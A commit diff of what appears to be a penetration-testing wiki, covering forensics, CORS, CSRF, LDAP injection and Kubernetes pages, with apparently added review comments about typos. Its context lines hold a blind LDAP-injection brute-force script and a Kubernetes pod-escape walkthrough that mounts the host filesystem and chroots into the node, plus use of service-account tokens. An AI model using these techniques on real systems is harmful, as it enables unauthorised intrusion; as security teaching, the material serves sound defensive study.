GitBook: [master] 8 pages and 14 assets modified

This commit is contained in:
CPol 2021-05-29 20:00:49 +00:00 committed by gitbook-bot
parent dfca7327db
commit 2f669dffc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
15 changed files with 24 additions and 22 deletions

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28509%29.png)
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png)
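Review bot: the sentence names both storage cases for `$Data` (data held inside the attribute, or pointers to the sectors where it resides) but only labels the second one as "not resident"; call the first case "resident" in the same sentence so the reader can connect the two terms to the screenshot. The hunk itself only swaps the image asset reference; the explanatory text is unchanged.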

View file

@ -32,7 +32,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](../../../.gitbook/assets/image%20%28495%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png)
### Volume Shadow Copies
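Review bot: typo in the context line: "Having these files you can sue the tool" should read "you can use the tool". The hunk otherwise only replaces the screenshot asset; the `.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle` command line is unchanged.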
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
### USB Detective
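Review bot: grammar in the context lines: "are a copy of the original ones, then won't survive" should be "so they won't survive", and "the timestamps about when the USB connection was produced" reads better as "the timestamps of when the USB device was connected". The hunk only replaces the screenshot that follows the `C:\Windows\inf\setupapi.dev.log` / `Section start` instruction.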

View file

@ -593,7 +593,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
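Review bot: "Accessing the Device Shell" is cited as a section but not linked, so the reader cannot follow the reference before the socat/apt-get step; add the link to that section. The hunk only changes the screenshot after step 6 of the console-log procedure.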

View file

@ -89,9 +89,13 @@ Access-Control-Max-Age: 240
![](../.gitbook/assets/preflight.svg)
Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
Note that usually \(depending on the content-type and headers set\) in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
{% hint style="info" %}
**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
{% endhint %}
## Exploitable misconfigurations
Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.
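Review bot: grammar in the new sentence: "it must contains an _Access-Control-Allow-Origin_ header" should be "it must contain". The added qualification "usually (depending on the content-type and headers set)" is the right correction, since whether a GET/POST skips the pre-flight depends on the conditions the new hint links to; name the term "simple request" in the sentence itself so the hint and the MDN `#simple_requests` anchor attach to a defined concept.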

View file

@ -73,7 +73,13 @@ In this situation, the attacker can again perform a CSRF **attack if the web sit
### Content-Type change
You can change to POST Content-Type to _**application/json, application/x-url-encoded**_ or _**form-multipart**_ and maybe you will be able to bypass the CSRF token.
According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests), n order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
### Referrer / Origin check bypass
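Review bot: the new sentence starts with "n order to" (missing "I"), and "severs logic" should be "server's logic". The content-type names in the first sentence ("application/x-url-encoded", "form-multipart") do not match the correct values listed directly below (`application/x-www-form-urlencoded`, `multipart/form-data`); align them, and state that `application/json`, `text/xml` and `application/xml` are outside that list, so a request using them is no longer a simple request and will trigger a pre-flight.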

View file

@ -16,7 +16,7 @@ LDAP Injection is an attack used to exploit web based applications that construc
**Filterlist** = 1\*filter
**Item**= simple / present / substring
**Simple** = attr filtertype assertionvalue
**Filtertype** = _'=' / '~=' / '>=' / '<='_
**Filtertype** = _'=' / '~=' / '>=' / '<='_
**Present** = attr = \*
**Substring** = attr ”=” \[initial\] \* \[final\]
**Initial** = assertionvalue
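Review bot: the two `**Filtertype**` lines render identically, so the change in this hunk is not visible here (most likely markdown escaping only); confirm it is intentional. In the context lines, `Substring` uses curly quotes (`”=”`) while the other productions use straight quotes; use straight ASCII quotes so the grammar can be copied verbatim.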
@ -128,7 +128,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
```python
#!/usr/bin/python3
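Review bot: the new version of the "default LDAP attributes" sentence breaks the link: the escaped `\*\*\[` ... `\]\(` ... `\)` sequence renders as literal asterisks and brackets around the raw URL instead of a bold link, whereas the old line `**[default LDAP attributes here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**` was correct markup; restore it. Also "LDAP objects contains" should be "LDAP objects contain".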
@ -156,7 +156,7 @@ for attribute in attributes: #Extract all attributes
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
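Review bot: indentation is lost in this rendering, so the placement of `if char == alphabet[-1]:` relative to the `break` cannot be verified from the hunk; it is only correct if it sits inside the per-character loop so that `finish = True` is set solely when the whole alphabet has been tried without a match. Since the loop iterates over ASCII letters, digits and symbols (strings), `str(char)` in `value += str(char)` is redundant and can be `value += char`.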

View file

@ -76,11 +76,13 @@ The following `kubectl` commands indicates just how to list the objects. If you
{% endhint %}
### Using kubectl
when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
```bash
alias kubectl='kubectl --token=<jwt_token>'
```
[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
### Get namespaces
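Review bot: the alias `kubectl --token=<jwt_token>` places the bearer token on the command line, where it is recorded in shell history and visible in process listings to other users on the host; add this caveat to the text, or suggest a kubeconfig credential entry instead. Minor: "when using kubectl" should start with a capital letter, and "different to" should be "different from".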
@ -273,12 +275,10 @@ If you are able to create new pods you might be able to escape from them to the
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
Then you create your attack.yaml file
```yaml
apiVersion: v1
kind: Pod
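Review bot: filename mismatch: this step says to create `attack.yaml`, but the apply step further down runs `kubectl apply -f attacker.yaml`; use one name in both places. Since the hunk removes two lines here, also say what the reader should take from the `kubectl get pod <name> -o yaml` output (the container and volume sections) when building the manifest.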
@ -300,35 +300,29 @@ spec:
- name: host-fs
mountPath: /root
restartPolicy: Never
```
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
After that you create the pod
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
Now you can switch to the created pod as follows
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
```
And finally you chroot into the node's system
```bash
chroot /root /bin/bash
```
Information obtained from:\
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
[Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
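Review bot: collapsing the two "Information obtained from" links onto a single line drops the `\` line breaks that separated them, so the two titles now run together; keep them on separate lines or make them a list. The comment on the `kubectl exec -it attacker-pod` line says the name is "defined in the yaml file", but the `metadata.name` field is outside this hunk, so check that it really is `attacker-pod`.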
## Sniffing

View file

@ -113,5 +113,3 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##
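Review bot: the context line "y por aqui la metodologia owasp para analizar firmware" is in Spanish while the rest of the list is in English; translate it ("and here the OWASP methodology for analysing firmware"). The hunk also leaves an empty `##` heading at the end of the file; remove it.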